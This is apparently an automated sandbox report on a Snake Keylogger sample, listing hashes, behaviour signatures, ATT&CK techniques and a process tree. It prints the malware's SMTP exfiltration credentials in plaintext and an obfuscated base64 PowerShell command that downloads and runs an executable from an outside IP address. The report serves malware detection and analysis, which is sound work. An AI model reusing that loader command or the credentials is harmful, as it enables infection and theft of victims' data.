snakekeylogger | 1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64

Analysis

max time kernel
117s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27/09/2024, 08:57

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

17116a0f43508549998ef6618154d77a.hta
Size

115KB
MD5

17116a0f43508549998ef6618154d77a
SHA1

e71af8b0489263e476521a5fd6e22e5511369c4d
SHA256

1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64
SHA512

a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9
SSDEEP

96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.teilecar.com
Port:
587
Username:
[email protected]
Password:
Manta924porsche=911
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/2648-84-0x0000000000140000-0x0000000000166000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	5060	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
5060	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
3104	dllhost.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000800000002345d-69.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3104 set thread context of 2648	3104	dllhost.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5060	powershell.exe
5060	powershell.exe
2648	RegSvcs.exe
2648	RegSvcs.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3104	dllhost.exe
3104	dllhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	2648	RegSvcs.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 5076	3460	mshta.exe	84
PID 3460 wrote to memory of 5076	3460	mshta.exe	84
PID 3460 wrote to memory of 5076	3460	mshta.exe	84
PID 5076 wrote to memory of 5060	5076	cmd.exe	86
PID 5076 wrote to memory of 5060	5076	cmd.exe	86
PID 5076 wrote to memory of 5060	5076	cmd.exe	86
PID 5060 wrote to memory of 2956	5060	powershell.exe	87
PID 5060 wrote to memory of 2956	5060	powershell.exe	87
PID 5060 wrote to memory of 2956	5060	powershell.exe	87
PID 2956 wrote to memory of 4080	2956	csc.exe	88
PID 2956 wrote to memory of 4080	2956	csc.exe	88
PID 2956 wrote to memory of 4080	2956	csc.exe	88
PID 5060 wrote to memory of 3104	5060	powershell.exe	89
PID 5060 wrote to memory of 3104	5060	powershell.exe	89
PID 5060 wrote to memory of 3104	5060	powershell.exe	89
PID 3104 wrote to memory of 2648	3104	dllhost.exe	90
PID 3104 wrote to memory of 2648	3104	dllhost.exe	90
PID 3104 wrote to memory of 2648	3104	dllhost.exe	90
PID 3104 wrote to memory of 2648	3104	dllhost.exe	90

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17116a0f43508549998ef6618154d77a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\weblt0fv\weblt0fv.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6CA.tmp" "c:\Users\Admin\AppData\Local\Temp\weblt0fv\CSC5728027D3C4E4C63B9539276CBFAD3.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3104
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC6CA.tmp

Filesize
1KB

MD5
12be9e742bf6347362224d14214ace24

SHA1
51d1b24388f5cb46747961de18889fbf04b1fa62

SHA256
54a90a6ed5f7b26152c14e588099d6526b6b788384a73fb1fdff2433bc93a812

SHA512
81c3d990e4d5ab5aa9e1dd11771f2570db6823b93ebbff8ce4d4a6f1961d0485fc29c00c71be0cef5d03fa5967a4d6712b89b543be9d4b5e6eb3aaea2d35e7ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2gzjnwo0.ims.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\weblt0fv\weblt0fv.dll

Filesize
3KB

MD5
4e8755e317147a3f6ffa2f6a4479fa3c

SHA1
4afb41c2b61853cd566bfcdd1d30d4660f11813a

SHA256
83c5c9d082519b3f56244f999160fc1d85de6d7f48e8961346b7988d141b1709

SHA512
b158ad6533067915452a927d9131d9d7663bc54b4f15872841f91dc9384fbb629520066903f53045df017d116cd2b670c21cc89376d8ec91c4fed7bf59b764bc

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
956KB

MD5
249f4ca7f1cc801c87cebd0cdf0b398e

SHA1
1241f91fa9239ed0553c33f6d3651644813f6f84

SHA256
b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556

SHA512
0b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\weblt0fv\CSC5728027D3C4E4C63B9539276CBFAD3.TMP

Filesize
652B

MD5
68859cb8213ee90572bdaf61cfbee7b0

SHA1
492b1daee6da0f05b3dbcbeb109c55d616842e2a

SHA256
0dd0e880355e769daa631d42068c95ebc036ebe0dbe2f880695f5881d221f650

SHA512
e9a4e1b99beb6177bac48eb50b821414521a90392441532e84c4696d8c1f973e044629777f36470691b19279d609d319d9c6dc5a2c15dc35a56800ef7cc8e4a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\weblt0fv\weblt0fv.0.cs

Filesize
475B

MD5
74ac079a164eedfd18ee0237dead2da7

SHA1
62575f712ded8ea2637ee5e5eda8ae9cf2919dc1

SHA256
6c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615

SHA512
7994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\weblt0fv\weblt0fv.cmdline

Filesize
369B

MD5
f856acf05e7480d5cc89432ed150fe6d

SHA1
3c5b76451602f93b2ea7d11adc7dada25b64e367

SHA256
35dde094d1ad960795e0d05fcc5b31a10f1614e89b552eb2e3df1b6529b378de

SHA512
eee5f615589563aa0643f01a92b94316ba0e161500d65b35f4e34b7a08926a63e4496f2d72b0b113d42f938c957654de99cac75f9dd45b9702606f2657b7ec71

Download Submit
memory/2648-87-0x0000000005D50000-0x0000000005F12000-memory.dmp

Filesize
1.8MB

Download
memory/2648-84-0x0000000000140000-0x0000000000166000-memory.dmp

Filesize
152KB

Download
memory/2648-85-0x00000000049E0000-0x0000000004A7C000-memory.dmp

Filesize
624KB

Download
memory/2648-86-0x0000000005B30000-0x0000000005B80000-memory.dmp

Filesize
320KB

Download
memory/2648-88-0x0000000005C20000-0x0000000005CB2000-memory.dmp

Filesize
584KB

Download
memory/2648-89-0x0000000005BE0000-0x0000000005BEA000-memory.dmp

Filesize
40KB

Download
memory/5060-41-0x00000000070A0000-0x00000000070B1000-memory.dmp

Filesize
68KB

Download
memory/5060-22-0x000000006DDD0000-0x000000006DE1C000-memory.dmp

Filesize
304KB

Download
memory/5060-23-0x000000006DF40000-0x000000006E294000-memory.dmp

Filesize
3.3MB

Download
memory/5060-33-0x0000000006140000-0x000000000615E000-memory.dmp

Filesize
120KB

Download
memory/5060-34-0x0000000006E10000-0x0000000006EB3000-memory.dmp

Filesize
652KB

Download
memory/5060-35-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-36-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-37-0x0000000007540000-0x0000000007BBA000-memory.dmp

Filesize
6.5MB

Download
memory/5060-38-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

Filesize
104KB

Download
memory/5060-39-0x0000000006F20000-0x0000000006F2A000-memory.dmp

Filesize
40KB

Download
memory/5060-40-0x0000000007140000-0x00000000071D6000-memory.dmp

Filesize
600KB

Download
memory/5060-0-0x000000007151E000-0x000000007151F000-memory.dmp

Filesize
4KB

Download
memory/5060-42-0x00000000070D0000-0x00000000070DE000-memory.dmp

Filesize
56KB

Download
memory/5060-43-0x00000000070E0000-0x00000000070F4000-memory.dmp

Filesize
80KB

Download
memory/5060-44-0x0000000007120000-0x000000000713A000-memory.dmp

Filesize
104KB

Download
memory/5060-45-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/5060-21-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-20-0x0000000006B50000-0x0000000006B82000-memory.dmp

Filesize
200KB

Download
memory/5060-19-0x0000000005B70000-0x0000000005BBC000-memory.dmp

Filesize
304KB

Download
memory/5060-18-0x0000000005B50000-0x0000000005B6E000-memory.dmp

Filesize
120KB

Download
memory/5060-58-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/5060-17-0x00000000055A0000-0x00000000058F4000-memory.dmp

Filesize
3.3MB

Download
memory/5060-64-0x000000007151E000-0x000000007151F000-memory.dmp

Filesize
4KB

Download
memory/5060-65-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-66-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-67-0x0000000007450000-0x0000000007472000-memory.dmp

Filesize
136KB

Download
memory/5060-68-0x0000000008170000-0x0000000008714000-memory.dmp

Filesize
5.6MB

Download
memory/5060-7-0x0000000005530000-0x0000000005596000-memory.dmp

Filesize
408KB

Download
memory/5060-81-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-6-0x0000000004E30000-0x0000000004E96000-memory.dmp

Filesize
408KB

Download
memory/5060-5-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-4-0x0000000004B90000-0x0000000004BB2000-memory.dmp

Filesize
136KB

Download
memory/5060-3-0x0000000004F00000-0x0000000005528000-memory.dmp

Filesize
6.2MB

Download
memory/5060-2-0x0000000071510000-0x0000000071CC0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-1-0x0000000000C10000-0x0000000000C46000-memory.dmp

Filesize
216KB

Download